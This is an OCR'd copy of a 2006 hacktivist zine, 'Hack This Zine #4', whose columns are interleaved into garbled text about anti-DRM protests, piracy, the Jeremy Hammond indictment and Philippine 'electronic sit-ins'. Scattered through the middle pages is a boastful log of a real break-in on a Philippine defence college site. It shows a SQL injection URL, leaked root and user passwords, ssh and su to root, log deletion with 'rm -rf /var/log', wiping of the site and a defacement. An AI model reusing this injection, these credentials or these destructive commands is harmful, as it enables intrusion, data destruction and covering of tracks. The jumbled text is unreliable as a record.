When I was a kid, hackers were criminals. Hackers were dreamers who saw through this world and its oppressive institutions. Hackers were brilliant maniacs who defined themselves against a system of capitalist relations, and lived their lives in opposition. Every aspect of the hack- er’s life was a tension towards freedom -- from creating communities that shared information freely, to using that information in a way that would strike out against this sti- filing world. When nobody understood how technology worked in the systems that surrounded us, hackers figured those systems out and exploited them to our advantage. Hackers were criminals, yes, but their crimes were defined by the laws of the institutions that they sought to destroy. While they were consistently portrayed as criminals by those in- stitutions, their true crimes were only those of curious- ity, freedom, and the strength to dream of a better world.
Somewhere along the way the ruling class started pay- ing hackers to defend the very systems that they had so passionately attacked. Originally we took these jobs while smiling out of the corners of our mouths, think- ing that we were only tricking those in control. But at some point we tricked ourselves. Where power does not break you, it seduces you - and seduced by the si- ren song of commodity relations, we lost sight of our dreams and desires. Instead of striking out to create a new world, we found ourselves writing facial reconition software that sought to preserve this one at all costs.
Today, the attempts at revival of hacker culture make hackers nothing more than mere hobbyists. We pat our- selves on the back and smile about how we’re really hack- ers again, that we’ve gotten back to tinkering, that we’re doing interesting things with LEDs once more. But this tinkering is only the shadow of its former self. Asking for the right to modify a commodity that has been sold to us does not challenge anything. These proj- ects only help to create bigger cages or longer leash- es, recuperating our desires and satisfying our sense of ingenuity by putting wall paper on this ugly world.
But some of us still wipe our asses with white papers and dream dangerously. If you’re not satisfied with people mod- ifying their SUVs and being called hackers, look around, find those of us who aren’t either, and hack the planet. Software Freedom Day Hack This Zine #4 Chicago ~~ Sept 14th Ammo for the Info-warrior Calling all free-wheeling free-information free-reproductionistas! Attention to the hackers who love the streets! For the activists that just want to share Table of Dis-Contents resources! And for the militant media makers in search of free and open access to knowledge and ideas. Intellectual Property Regimes -NEWS and INTRO- Sept 14 2006 Creative Commons Zen and the Art... Location TBA Chicago, IL USA Low Power Radio FM of Non-Disclosure - pg #3 Internet Law for Activists Anti-DRM Flash Mob - pg #2 http://www.chicagolug.org Public Space http://www.freegeekchicago.com U.S gov. Indicts Hacktivist - pg #5 http://www.hackbloc.org/chicago Non Profit How the Net Was Lost - pg #9 http://chicagolug.org/lists/listinfo/chicago-hacktavismFree Labor -THEORY- This event will gather some of the regions most committed activist pro- Fear and Paranoia - pg #6 grammers, free software lovers, socially engaged artists, independent me- How the Net was Lost - pg #9 dia makers and critical thinkers to brainstorm and develop an agenda for Consumerist Society Revisited - pg #7 the technological support of radical social movements in the great lakes region. -SKILLS- Exotic vulnerabilities - pg #19 artificial hacker - pg #27 Disrespect Copyrights... in Practice - pg #10 Advanced Cross-Site-Scripting - pg #15 Cellular Suprises - pg #17 Windows BOF Adventures - pg #22
-RECIPES- Off the Record Messageing - pg #28 Free Shell - pg #30 d a i 5 y c h a i n . n e t How to Start a Hack Bloc - pg #29 dai5ychain is a public-access computer lab and events Start a Wargames Competition - pg #28 platform located in pilsen, chicago, in a former flower dai5ychain aims to provide a variety of technical re- -ACTION- shop. the dai5ychain project operates as a platform for sources, and is specifically interested in the following: new media performance and screening events devised 01 : open_platforms -- open source/hackable/extensible Free the Sagada 11 - pg #31 and programmed in response to a unique network archi- software systems; examples: linux, pureData, superCol- tecture. it shares a building with the Busker project initi- lider Let’s throw a PIRATE PARTY - pg #35 ated and programmed by tamas kemenczy and nicholas 02 : obsolescent_kit -- ‘obsolete’ and otherwise antiquat- Capture the Flag - pg #36 o’brien. the dai5ychain project is developed and main- ed and therefore commercially inaccessible hardware tained by jake elliott, lynn hurley, tamas kemenczy and and software platforms for artmaking; examples: com- others. modore64, dumb terminals, dot-matrix printers, vectrex
the hacklab project has from its inception included work- the space is open daily from 12pm->5pm for general ac- anti-(C)opyright 2006 shops and skill-sharing sessions, and dai5ychain aims cess and hosts one-off and recurrent events in the late to enable these vital activites as well. members of the evening. access to dai5ychain outside of these sched- This zine is anti-copyright : you are encouraged to Reuse, Reword, and Reprint ev- local software development and new media arts commu- uled times may be requested via a form on the website erything found in this zine you please. This includes: printing your own copies to nity will be contacted and asked to provide workshops, and is encouraged and enabled whenever possible. distribute to friends and family, copying and pasting bits of text in your own works, and the space will also be open and very receptive to mirroring electronic versions to websites and file sharing services, or anything else proposals of this nature. you could think of - without asking permission or apologizing! Anti-DRM Flash Mob Hits Apple Stores in Eight Cities
In a coordinated action at 8 cities across the United States, technologists donned bright yellow Hazmat suits and swarmed Apple Stores, warning shoppers and staff that Apple iTunes is infected with Digital Restrictions Management (DRM) and that Apple’s products are defective by design.
The technologists displayed posters mocking Apple’s marketing campaign, Intellectual Property Regimes with graphic images of a silhouetted iPod users bound by the ubiquitous Creative Commons white earbud cord. The group claim that as the largest purveyor of media Hack this Zine #4; Ammo for the info-warrior infected with DRM, Apple have paved the way for the further erosion of Low Power Radio FM We are an independent collective of creative hackers, crackers, artists and anarchists. We gather to share users’ rights and freedoms made possible by the technology. Internet Law for Activists skills and work together on several projects to teach and mobilize people about vulnerability research, practical anarchy, and how free technology can build a free society. We are an open, free flowing, and ever The coordinated protest was organized by DefectiveByDesign.org, a di- Public Space changing collective which generally works on IRC. Everyone is encouraged to explore and contribute to rect-action campaign targeting Big Media and corporations peddling DRM. Non Profit the group and it’s related projects. “In the 17 days since the launch of the campaign we have had more than Network of Projects hackbloc/hacktivist: flatline, alxciada, darkangel, themightyowl, 2,000 technologists sign the pledge to take direct action and warn people Free Labor hackthissite.org hexbomber, blissi, whiteacid, sally, squee, ardeo, pacifico, Ln about DRM” was how campaign manager Gregory Heller described the hack this site is a free and legal training ground that allows other helpers: spydr, phate, moxie, scenestar, truth, leachim, explosive grassroots effort. people to test their security skills against a series of realistic kage, morklitu, rugrat, ikari, s1d, skopii, bfamredux, kuroishi, hacking challenges. we provide a friendly environment for wyrmkill, mochi, smarts, random cola More information, see www.defectivebydesign.com or www.fsf.org
hackbloc.org Make Contact About a dozen activists gathered in Chica- Hackblocs are local groups and gatherings where hackers and project organizer Jeremy Hammond - go at the Apple store on Michigan Ave, the activists gather to discuss, share skills, and collaborate on proj- whooka at gmail.com busiest shopping area of Chicago, to pro- ects related to free technology, open source, tech activism, and test Apple’s use of Digital “Rights” Manage- more. We work to defend a free internet and a free society by irc.hackthissite.org SSL port 7000 ment technology. Members from the local mixing hacker and activist strategies to explore both defensive #hackthissite #hackbloc #help Chicago Linux Users Group (chicagolug. and direct action hacktivism. Each local group is autonomous org), Free Software Foundation(fsf.org), and together we form a decentralized network to collaborate visit our online forums at Defective By Design(defectivebydesign. and coordinate actions in solidarity with other social justice http://www.criticalsecurity.net com), and Hackbloc Chicago(hackbloc.org/ struggles around the world. or http://www.hackbloc.org/forums chicago) had helped organize the event by current collectives: email us at [email protected] bringing bio-hazard suits, anti-DRM signs San Francisco Bay Area - http://www.hackbloc.org/sf/ or [email protected] and stickers, and posters of people getting Chicago - http://www.hackbloc.org/chicago/ roped up by their iPod cords mocking the Canada - http://www.hackbloc.org/ca/ official Apple ads. Shoppers stood in awe
UK - http://www.hackbloc.org/uk/ GET COPIES OF THE ZINE! Electronic copies of the zine are available online at http://www. and curiosity as we ran around the front of US-south http://hackbloc.org/south hackbloc.org/zine . We have produced two versions of the zine: the store in a panic, handing out flyers and Maine - see forums a full color graphical PDF version which is best for printing and otherwise creating a public spectacle. Sev- also includes all sorts of extras, as well as a raw TXT version eral Apple employees gathered by the front hacktivist.net which is a more compatible and readable if you just want the entrance of the store preventing us from a ‘think tank’ for hacktivist related activities: user submitted articles. Peter Brown, executive director of the Free Software Foundation, entering the store while refusing to com- exploits, images, and articles as well as resources on getting involved with hacker activism. addresses Chicago linux users hackers and activists at an Anti-DRM rally ment on Apple’s use of DRM technology. Having the zine in your hands is still the best way to experience our zine. If you can’t print your own(double sided 8.5x11) then disrespectcopyrights.net you can order copies of this issue and all back isssues online an open collection of anti-copyright images, pdfs, texts, movies, at the nice fellows at Microcosm Publishing(microcosm.com) pirate party condemns raid on file sharing servers music, and more related to programming, hacking, zines, diy who are based out of Portland. If you live in Chicago, you can culture, and activism. the system is integrated into a mediawiki grab a copy at Quimbys Books or at the dai5ychain.net space in site and also allows people to upload files. Pilsen. Or just visit us at one of the many events Hackbloc can be found locally, regionally, and nationally! We are many, they are few! zine staff: darkangel, nomenumbra, alxciada, br0kenkeychain, tonto, r0xes, sally hts staff: iceshaman, custodis, scriptblue, outthere, mcaster, technoguyrob, wells,
June 3rd, 2006: Pirates gather in Stockholm to protest the May 31st police raid on over a hundred servers related to The Pirate Bay, Piratbyrån, and more. Demonstrators demanded that the Swedish government should seek a comprimise on the file sharing issue rather than criminalizing more than a million Swedish citizens. What did you do last night? and a gay guy, and a tall out of my body and spilled Jesus looking character, all over the streets. and the art of I can tell you what I did. and a girl who told me she finds perfectly good bagels in the dump- Today, I am sore, non-disclosure I played Urban Capture the Flag, ster. but I am also grateful mother fucker. for such an evening of unexpected We got little bandanas to distinguish fun. Zen As hackers, squatters, scammers and That being said, we can move on to more I saw signs and posters teams, phreaks, we are often asked, “That’s pressing issues: how can we help the and little handbills all over and we hid our flags and planned I met people I would never ordinarily amazing, how do you do it?” Yes, there hacker movement to learn and grow with- Wicker Park for the past couple our strategy. meet. still is magic out there, but it’s not going out giving away and spoiling all our tricks? weeks. to find you, nor will you find it through a This was the big question as we were put- and we were off. I learned that you can find perfectly google search*. ting together this issue of our zine, think- “Reclaim the City” good bagels ing about whether we should publish in- “play Urban Capture the Flag” And I felt like I was in Die-Hard in the right dumpsters. and the Bourne-Identity for the next It’s a vulnerability so long as the vendor structions on ‘how to hack X and hack Y’. with a map, three hours. I smoked a bowl with the leaders of isn’t informed and releases a patch; it’s a Certainly we don’t want to become some a city grid, the event, squat so long as it’s “legal owner” doesn’t “eliter than thou” clique because it again almost a square mile, It was awesome. a pair of twin activists. find out and kicks you out; and it’s an un- becomes about individual ego and not the separated by a great dividing derground party so long as no one slips up community, and while individuals come line known as Milwaukee avenue. We snuck around the city, Man, are they interesting cats. and police raid the place. Same goes for and go, ideas last forever. So we have to in two and threes, sneaking into theatres, copy hookups, and train ourselves and others willing to learn, And, an awesome little drawing and solo advances. they do stuff, other scams. but find a way to do it in a carefully calcu- of a dude with a beard running with anything, they just lated manner. And it’s not gonna happen a flag. Once we crossed into enemy seem to want to take action, How do we keep these tricks alive? By by giving away proof-of-concept code but territory, we were vulnerable be heard, have fun, keeping them a secret only to those who by teaching the approach and technique so It said to show up at the Damen to capture and imprisonment. get noticed, make a statement, need to know. A magician never reveals people can figure it out for themselves. Blue Line train stop at 7 pm. have other people wonder about her secrets lest it will cease to be magical. But we were not alone in the streets, them You will likely never hear the magician’s I don’t think that was our conscious goal I did. it was Wicker Park on a Saturday instead of wondering about a TV true name either. of Hack This Site but it certainly was the night, full of artificially sweetened famous result. We wanted to introduce people to I had nothing else to do. we could try to blend in, people. always looking out for a bastard Why do people publicly release these the wild world of hacking so we put to- It’s strange, with a white bandana. Last night, tricks in the first place, and what effects gether several series of hacking challeng- these days, they chose Capture the flag. does this have? Those vulnerable to the es modeled after real websites with real when I don’t have a gig And if you saw one, and it was quite a success. trick will likely find out and promptly patch vulnerabilities. Creating this safe and legal on a weekend, you ran. their weaknesses. And law enforcement training front group*, people were able to I never really have anything to do. 3 hours long, will have an opportunity to learn and train jump in and start with the basics, not by I ran like I haven’t run 30+ strangers showing up themselves as well as find out who to bust. downloading exploits or “appz”, but by So I show up for summer camp since I was fourteen. on a cold, wet night. Or the trick will fall into the wrong hands hands-on security research. People some- games in cold weather and light rain. and be counter-productive (script kiddies, times give us shit because we’re dominat- running for my life, They have my email address, right wingers, fascists, etc). ed by newbies or that we are aiming too there, at the train stop, as if nothing else mattered and I’m going to show up low. Rest assured, there are plenty of us I met 30 perfect strangers. in the world except to get at whatever they do next. All so you can get your name on some with skill waiting in the background wait- back over Milwaukee Avenue. security list as the one who “found it first”, ing for YOU to start asking the right ques- we divided into two perfect teams. Now if you’ll excuse me, and in all probability, you probably weren’t tions so the real training can begin. Yes, When was the last time you I have to write a theme song the first anyway, as the real people who we want to share our shit with those who They were mostly strangers did a full on sprint until you just for the Rat Patrol. made the discovery would want nothing want to learn. to eachother, a few pockets couldn’t run anymore? to do with such lists to begin with. And of friends here and there, those are the guys who but mostly just the bored, For me, its been a while. ride around Chicago on they probably have a billion more impor- Before you can walk, you have to learn curious, and adventurous those big, tall, crazy bikes. tant ways of applying the trick in the first to crawl. And when you can walk you can type who would show up I don’t find myself sprinting place. be shown the path. And this is what every for such an event. so often these days. I met a few last night, white-hat, security consultant, or full-dis- and they need a theme song. So before you spill the beans, ask your- closure advocate fails to see: we can show Wide demographic, but last night, self whether there are people who need you the path, open the door, and offer you punks and yuppies I ran like the wind, -p these tricks more than you do, or whether the red pill, but you have to take that first and thirty-somethings until the wind was completely there are already such people at work and step and become that black hat hacktivist would full disclosure jeopardize their se- ninja. cret plans? ... I played Urban Capture the Flag Cause you’re not helping anybody when friendly place for not just black hat hack- RICKHARD http://www.piratpartiet.se I AM A you alert the vendor or post that 0day tivist ninjas but for most people in gen- http://www.pirate-party.us proof of concept code. eral, unless you happen to be in that top FALKVINGE PIRATE Or get that full time computer security job 1% where you have your own mansion, for the phone company. private jet and congressman. Every day The citizens could admittedly pick pieces of knowledge to them- Friends, citizens, pirates: selves, but there always had to be somebody who could be made Or turn in your buddies to the FBI when we hear about how hackers and activists responsible if – what a horrible thought – somebody happened to the going gets tough. are criminals and terrorists. If you watch There is nothing new under the Sun. pick up a piece of wrong knowledge. television you are also probably tired of My name is Rickard Falkvinge, and I am the leader of the Pirate And this very thing is undergoing a fundamental change today This is what is known and loathed as hearing about how illegally tapping your Party. - because the Internet does not follow the old model anymore. We “selling out”, and it helps nobody but the phone or reading your mail protects os not only download culture and knowledge. We upload it to others During the past week we have seen a number of rights violations at the same time. We share files. The knowledge and the culture forces which are working to destroy the from terrorism, or how another thousand taking place. We have seen the police misusing their arresting have amazingly lost their central point of control. hacking movement. The people who are dead babies in Iraq is a Strong Victory rights. We have seen innocent parties being harmed. We have seduced into it either end up regretting it for Worldwide Democracy. So instead of seen how the media industry operates. We have seen how the And as this is the central point of my speech, let me lay it out in politicians up to the highest levels bend backwards to protect the some detail. or lose a bit of their humanity in the pro- boring you and further let me encourage media industry. cess of becoming a zombie worker bee for you to Turn Off That Television and Get – Downloading is the old mass media model where there is a the Establishment. Involved with your Community cause Now This is scandalous to highest degree. This is the reason why we central point of control, a point with a ‘responsible publisher’ are here today. – somebody who can be brought to court, forced to pay and so is the Time to Act: on. A central point of control from where everybody can download So you’ve gone this far, but where are The media industry wants us to believe that this is a question knowledge and culture, a central point that can grant rights and about payment models, about a particular professional group take them away as needed and as wanted. we going and what do we do next? You’ve getting paid. They want us to believe that this is about their drop- probably realized this world isn’t a very ping sales figures, about some dry statistics. But that is only an Culture and knowledge monopoly. Control. excuse. This is really about something totally else. Filesharing involves simultaneous uploading and downloading • get involved with your local indymedia center to tell the stories To understand today’s situation in the light of the history, we must by every connected person. There is no central point of control at go back 400 years - to the time when the Church had the mo- all; instead we have a situation where the culture and the informa- corporate media ignores nopoly over both culture and knowledge. Whatever the Church tion flow organically between millions of different people. • set up servers for radical websites and email lists and teach them said, was the truth. That was pyramid communication. You had one person at the top talking to the many under him in the pyra- Something totally different, something totally new in the history of how to communicate securely on the internet mid. Culture and knowledge had a source, and that source was human communications. There is no more a person that can be the Church. made responsible if wrong knowledge happens to spread. • find ways to get shit for free(free copies, free internet, free public transportation, etc) and share it with those who need it the most And God have mercy on those who dared to challenge the cul- This is the reason why the media corporations talk so much ture and knowledge monopoly of the Church! They were sub- about ‘legal downloading’. Legal. Downloading. It is because they • help develop the next Internet, one that is free from NSA spooks, jected to the most horrible trials that man could envision at the want to make it the only legal way of things for people to pick up traffic shaping, hierarchal domain authorities, or corporate control time. Under no circumstances did the Church allow its citizens items from a central point that is under their control. Downloading, to spread information on their own. Whenever it happened, the not filesharing. in general Church applied its full judicial powers to obstruct, to punish, to harass the guilty ones. And this is precisely why we will change those laws. • help inspire those who will grow to be bigger stronger and smarter than you or I who will deal that final blow against capitalism and the There is nothing new under the Sun. During the passed week we have seen how far an acting party is prepared to go to prevent the loss of his control. We saw the state Today we know that the only right thing to happen for the society Constitution itself being violated. We saw what sort of methods to evolve was to let the knowledge go free. We know now that of force and attacks on personal integrity the police is prepared Galileo Galilei was right. Even if he had to puncture a monopoly to apply, not to fight crime, but in an obvious intention to harass There is still magic out there for those who seek it: don’t wait for of knowledge. those involved and those who have been close to them. it, it waits for you! We are speaking here about the time when the Church went out There is nothing new under the Sun, and the history always in its full force and ruled that it was unnecessary for its citizens repeats itself. This is not about a group of professionals getting to learn to read or to write, because the priest could tell them paid. This is about control over culture and knowledge. Because anyway everything they needed to know. The Church understood whoever controls them, controls the world. what it would mean for them to lose their control. The media industry has tried to make us feel shame, to say that Then came the printing press. what we are doing is illegal, that we are pirates. They try to roll a stone over us. Take a look around today – see how they have Suddenly there was not only a source of knowledge to learn failed. Yes, we are pirates. But whoever believes that it is shame- from, but a number of them. The citizens – who at this time had ful to be a pirate, has got it wrong. It is something we are proud started to learn to read – could take their own part of the knowl- of. edge without being sanctioned. The Church went mad. The royal houses went mad. The British Royal Court went as far as to make That is because we have already seen what it means to be with- a law that allowed the printing of books only to those print owners out central control. We have already tasted, felt and smelled the who had a special license from the Royal Court. Only they were freedom of being without a top-down controlled monopoly of cul- allowed to multiply knowledge and culture to the citizens. ture and knowledge. We have already learned how to read and how to write. This law was called “copyright”. And we do not intend to forget how to read and how to write, even Then a couple of centuries passed, and we got the freedom of if yesterday’s media interests do not find it acceptable. press. But everywhere the same old model of communication was still being used: one person talking to the many. And this fact MY NAME IS RICKARD, AND I AM A PIRATE! was utilized by the State who introduced the system of “respon- sible publishers”. US Government Indicts Hacker Activist with Felony Computer Fraud and Abuse Act charges
The US District Attorney and the FBI has pressed felony was responsible for informing ProtestWarrior.com of the at- charges against Jeremy Hammond, hacker activist and tack and has provided so-called evidence to the right-wing founder of website HackThisSite.org, related to the alleged group which was engineered to make Jeremy look like the hacking the website of the right-wing hate group Protest- perpetrator of the alleged hacking incident. This is appar- Warrior.com. The indictment issued on June 26, 2006 fol- ently what was responsible for the initial search warrant on lows an FBI investigation lasting more than a year since his apartment, and if brought up as evidence during the Jeremy’s apartment was raided in March ‘04 and accuses trial, will hopefully be thrown out on grounds of heresay him of violating the Computer Fraud and Abuse Act. due to the chain of custody.
The US DA alleges that Jeremy was involved with a hacker At the most recent court date, the DA asked Judge Zagel to group known as the Internet Liberation Front that allegedly formally admonish Jeremy for his history of criminal behav- hacked into and gained access to the entire database be- ior, most of which has involved minor misdemeanors for longing to the right-wing hate group ProtestWarrior.com. political protest related events. Following a recent arrest Originally, ProtestWarrior has baselessly accused Jeremy for ‘chalking sidewalks’, the judge warned Jeremy that any of ‘intending’ to use credit card data to make donations future arrests would result in either home confinement with [root@ndcp webmaster]# cd /opt/lampp/htdocs/ ndcpsite;ls to leftist and charity groups, although the FBI is not mak- electronic surveillance on his dollar, or completely revoke A: When did it all started? Let’s decipher- the myth, give A: Ive been informed that online/or virtual sit ins are legal ing any accusations related to intending or actually using his bail and put him in jail until the results of the trial. As the basic ideas or principles of Brigada Elektronikaabout.php on the slate executives.phpin some cases. Can indexnew. you elaborate this to justify attacking php mnsa.php postnews credit card data. Judge describes, Jeremy “no longer has the same free- for the stream of conscious humanity (left in anyone) to several targets including the PNP servers. under.php doms” he once held. digest. - acad.php faculty.php index.php Despite that no damage has been done to the ProtestWar- ErroR: There is no law that prohibits anyone to visit a web- moodledata qpopper4.0.5.tar. rior.com server, nor has any personal details or credit card Jeremy is now staying out of any direct action or illegal ac- ErroR: It started as a direct action project to support the site. It is simple as that. ELECTRONIC CIVIL DISOBEDIENCE against the PHIL gz Unnamed information has been released or used, Jeremy is facing tivities and major protests which could result in arrestableIPPINE NATIONALstriking POLICE workers of Gelmart Inc., last year. The mission was to launch a parallel action online. So basically,admission.php it was the A: Foundation.doc Do you consider yourself inss.php a hacker, anarchist if any- serious felony charges which could result in jailtime and situations, both for his safety and the safety of others. After moodle-latest-14.tgz researchold.php specific mission which binded the group to fulfill the proj- thing.. In times of war, commodity & marketed foods with massive fines. a 10 day Vipassana meditation course, he is also seekingtarget: national defense college of the philip uploadfile ect. Obviously, the project is very temporary and momen- plastic labels. How do you label yourself? mediation which those who he has wronged, or those pineswho apache gallery.php job2.htm tary. Three individuals were involved in this project, one of Jeremy is still “free” on a unsecured bond which imposes currently have issues with him, with the intent of resolving MU research.php them was inspired by the Electronic Disturbance Theatre, ErroR: I consider myself as a dreamer, struggling to exist several strong bail conditions which includes submitting to political issues in the community as well as for his personalhttp://www.ndcp.edu.ph/news2.php?actid=0000 viewbak.php regular drug testing, surrendering the right to a passport development. 0000000%20UNION%20SELECT%201,user,user,userhence, the name BrigadaElektronika was born. arrow2.gif in this history.phpWorld who proclaimed that job. dreaming is dead. or leaving the state without the judges permission, and no ,user,password,password,password,1,1,1,1,1, php MyImages SAL use of the computer / internet except for “web designing for While federal prosecuters claim that this is being treated1,1,1,1%20FROM%20mysql.user&opr=EMIP A: Is the goal long term or short lived? viewnews.phpA: Few criticisms coming from the elements of poseudo business purposes” as a standard criminal charge, it is obvious that this is a calendar.phpluddites iecs.php & immature elements in joseph the counterculture scene politically motivated trial as the amount of money the FBI root:6ff11b4906e6c714ErroR: We only want *crack!* to create a snapshot or a spot ndcpaaifrom view virtual direct actions are sched.php mere assimilation to the ma- Jeremy has not testified against, provided evidence, or has spent investigating and prosecuting this 21 year old root:ndcp123memory that will last too until easy time succumbs to death. Thereview.php- chinery of the State. What is your opinion? Do you have incriminated anyone else and has not cooperated with activist doublessly exceeds the next-to-no damages done fore, the goal is to let others create their own moment concat.phpi.e. any counter iemelif arguments about this.. library the FBI in any investigation or prosecution. He is the only to the right-wing ProtestWarrior.com website. http://www.ndcp.edu.ph/xamppdirect action(wether it is hacking, sit-in,etc.) Because, NDCPlegaldocs to schedule.php one who has been arrested in connection with this alleged http://www.ndcp.edu.ph/phpmyadminattain freedom/liberation is neither Long or Short. viewwithtt.phpErroR: A virus cannot be assimilated by any kind of sys- hacking indicent. As an activist who has worked to help and teach people Connectionstems, imagine ifl.php you are a virus. This tinylinks. little virus once it all his life, we ask the federal prosecutors and the judge nowA: don’t Most tellof the me activist you usecircles the are same rather passes new forto this form ofphp penetrates newindex.php a system, it can shutdown even shedule. the most- formi- Ironically enough, a former friend and administrator who that Jeremy not be given any jailtime for a ‘crime’ that has everything...direct action. Can this be a new wave of method & vantage php dable structure. webalizer had helped Jeremy work on the HackThisSite.org website resulted in no damage to any property or person. point for people, when Free Speech is outlawed when it contact.php images mandate. ftpcrosses www.ndcp.edu.ph the line? phpA: Lines havenews been drawn & there is no turning temp back. Com - user: nobody webmailments, statement you’d like to address.. before we wrap pass: ndcp123 UNITED STATES DISTRICT COURT ErroR: Yes. Because, as an activist, IMAGINATION is our Cssthis shit up. Images _mmServer NORTHERN DISTRICT OF ILLINOIS b. Defendant JEREMY ALEXANDER HAMMOND was an adminis- duty. It is our only arm to fight all forms of authority that Scripts news2.php Templates ssh [email protected] EASTERN DIVISION trator of the website hackthissite.org which described itself as “an threatens our capacity to think and express. ErroR:xampp Things have been tough lately for dreamers. They pass: ndcp123 online movement of hackers, activists and anarchists.” sayDownload dreaming’s dead, index-09132005.php that no one does it mnsa2.phpanymore. It’s not UNITED STATES OF AMERICA vs JEREMY A HAMMOND A: What are the dynamics of the group. Do you support dead,Photos it’s just been forgotten. Removed temp.php from our language. c. Between January and February 2005, defendant HAMMOND ac- h0no ... various struggles that is not directly connected with the Noelearning one teaches it so index091806.php no one knows it exists. mnsa3.php The dreamer Violations: Title 18, United States Code, Sections 1030(a)(2)(C) and cessed ProtestWarrior.com’s server without authority on multiple oc- phpwebsite testmail.php Brigada Elektronika in organizational basis..gid=500(webmaster) is banished to obscurity. Well I’m trying to change all that, 2– casions in an effort to obtain information not otherwise available to ssh [email protected] emipold.php index2bak.php mnsa4.php him or the general public, specifically, credit card numbers, home and I hope you are too. By dreaming every day.Dreaming [email protected]’s password: phpwebsite-0.10.1-RC2.tar.gz test.php COUNT ONE SPECIAL FEB 2005 GRAND JURY charges:– addresses, and other identifying information of the members and ErroR: The group is so loose, and we dont even consider with our hands and dreaming with our minds. Our planet is [webmaster@ndcp webmaster]$ id;uname -a;w emip.php index.html mnsa5.php customers of ProtestWarrior.com. BrigadaElektronika a group, but rather a name of a project. facing the greatest problems it’s ever faced. Ever. So what- uid=500(webmaster) pmaaaclass59 test-site 1. At times material to this indictment: So in terms of connecting to others in organizational basis, ever you do, don’t be bored. This is absolutely the most a. ProtestWarrior.com was a website that promoted certain political 2. On or about February 1, 2005, at Chicago, in the Northern District groups=500(webmaster) we prefer our individual capacity to decide and commit in exciting time we could have possibly hoped to be alive. opinions. ProtestWarrior.com’s website was maintained on a com- of Illinois, Eastern Division, and elsewhere, JEREMY ALEXANDER Linux ndcp 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 // let’s back up all their fun stuff ... joining other group’s action and projects. And things are just starting. puter server located in Miami, Florida. Visitors to the ProtestWar- HAMMOND, defendant herein, by interstate communication, inten- EST 2003 i686 i686 i386 GNU/Linux [root@ndcp ndcpsite]# tar -cvf ../archive.tar * rior.com website could become members of the website, and could tionally accessed without authority ProtestWarrior’s server, a protect- 09:59:53 up 34 days, 20:38, 2 users, load [root@ndcp ndcpsite]# ls -alR > ../archive.txt purchase items and make donations through an online store using a ed computer, and thereby obtained information, namely credit card Thanks toaverage: everybody 0.00, 0.00,to helped 0.00 with the Free the Sagada 11 campaign. The level of interna- credit card. As a result, the ProtestWarrior.com computer server con- numbers, home addresses, and other identifying information of its USER TTY FROM LOGIN@ IDLE // like a brick through a starbucks window... tained databases that included personal information about visitors members and customers, from that protected computer; In violation tional supportJCPU both PCPU on WHAT the streets and the internet was amazing and inspiring. to the website, including credit card account information, home ad- of Title 18, United States Code, Sections 1030(a)(2)(C) and 2 [root@ndcp ndcpsite]# rm -rf . dresses, names, and other identifying information. These databases root tty1 - 22Feb06 2:04m [root@ndcp ndcpsite]# rm -rf /var/log on the computer server were not available online to the general pub- FOREPERSON : UNITED STATES ATTORNEY– http://www.a-manila.org15.66s 0.58s -bash http://manila.indymedia.org http://www.geocities.com/efdavao/ lic. Rather, only authorized users who had been issued passwords webmaste pts/0 trip.cc.gt.atl.g 9:59am 0.00s // spill the goods by the administrators ProtestWarrior.com were permitted to access 0.03s 0.01s w [root@ndcp ndcpsite]# tar -xf fun.tar these databases of personal information [webmaster@ndcp webmaster]$ su Password: // these guys aren’t getting back in anytime [root@ndcp webmaster]# id uid=0(root) gid=0(root) groups=0(root),1(bin),2 (daemon),3(sys),4(adm),6(disk),10(wheel) [root@ndcp webmaster]# echo “pwned ;D” pwned ;D MANILA: BrigadaElektronica electronic day, launching a “virtual sit-in” campaign that disturbance group strikes again urged online activists to overwhelm the police Bringing Street Protest to Cyberspace Fear, Paranoia and mental health for hacktivists Web site with numerous hits. by Manila Indymedia “Technology has boasted that it enables people in getting closer to each other, so we Protesting alleged human rights abuses, NEWSBREAK! (28/3/2006) HACKTIVISTS “There is this thing keeping everyones lungs and lips Dont isolate yourself are going to show that if we can’t get closer to protesters calling themselves “Electronic Bri- expressing solidarity with the 11 political pris- locked, it is called fear and its seeing a great renissance.” If you are starting to feel overwhelming depression, don’t Malakanyang and protest, we will closely ex- gade” opened a Web site that directs visitors oners known as the Sagada 11 have hacked -The Dresden Dolls isolate yourself! Go find a trusted friend and let them know press ourselves inside Malakanyang palace to the main national police site. and defaced the website belonging to the how you are feeling. Interact with someone, even if it is itself by just one click,” says one of the group’s National Defense College of the Philippines. Every day I woke up with an overwhelming sense of dread. technician who want to keep anonymity. “You are about to take part in an online direct Their website now reads, “We don’t need the only for a couple hours. Your friends can help you ground action protest. Please confirm that you are government, we don’t need the military, we I couldn’t leave my bed, I was locked in my head, locked yourself and get into a healthier state of mind. MANILA-- The current ban of public assem- willingly taking part in this action by clicking need JUSTICE AND LIBERTY for the SAGA- in my a room of my own making in my mind. Trapped in a blies and free speech in the streets has given OK or exit without taking part by clicking can- DA 11!”, along with several links encouraging cage that I could not get out of. Fear had finally consumed Ok so sometimes maybe you should isolate birth to online protest action namely- “elec- cel,” the message said. people to show their support.[ Read More ] me, along with its twisted cousin paranoia. I new that I had yourself tronic sit-in.” UPDATES! (26/3/2006) VIRTUAL SIT-IN ends to get out of this state, this room. I couldn’t get out of my Sometimes there are too many people around in your ev- The activists, who are not identified, said today, says BrigadaElektronica in a message own head though, there has never been a jail more unes- BrigadaElektronica electronic disturbance their brand of “hacktivism” is legal because it forwarded through emails, the group thanked eryday life and you need to get away, this can easily hap- capeable than the one within our own minds. What hap- group first introduced electronic sit-in last year technically involves just visiting a the participants who corageously joined the pen in large shared living spaces as well as for those who pened to me is not an uncommon story. It happens all the as an online version of support to the striking Web site. direct action that shuts the PNP website down just work on a lot projects. Sometimes it is good to go out workers of Gelmart in Metro Manila who then (wednesday March 23). About 1,088 users time to hackers and activists and anarchists. We have the in the woods and camp for a few days. Go remember why occupied the factory, held a picket line and Police did not participated in the action bringing the mes- virtue of seeing many of the things that are really going on. you are working for a better world and what you are doing, obstructed the capitalist boss’s activity in comment im- sage FREE SAGADA 11. The group vowed There are some scary things happening in the world and [root@ndcp webmaster]# cd /opt/lampp/htdocs/ who you are. laying-off the workers. The group held m e d i a t e l y, to continue the campaign, saying, “stay tuned there are some truly sad things. But we can never let fear ndcpsite;ls a similar action by occupying (sit-in) for our next target.” - consume us. about.php executives.php indexnew. the official Gelmart website; of course, UPDATES! (24/3/2006) GEOCITIES.YA- Love yourself and others the action successfully declared HOO.COM responded to the ongoing vir- php mnsa.php postnews This is probably the most important point that I can make. under.php “no business as usual, workers on tual 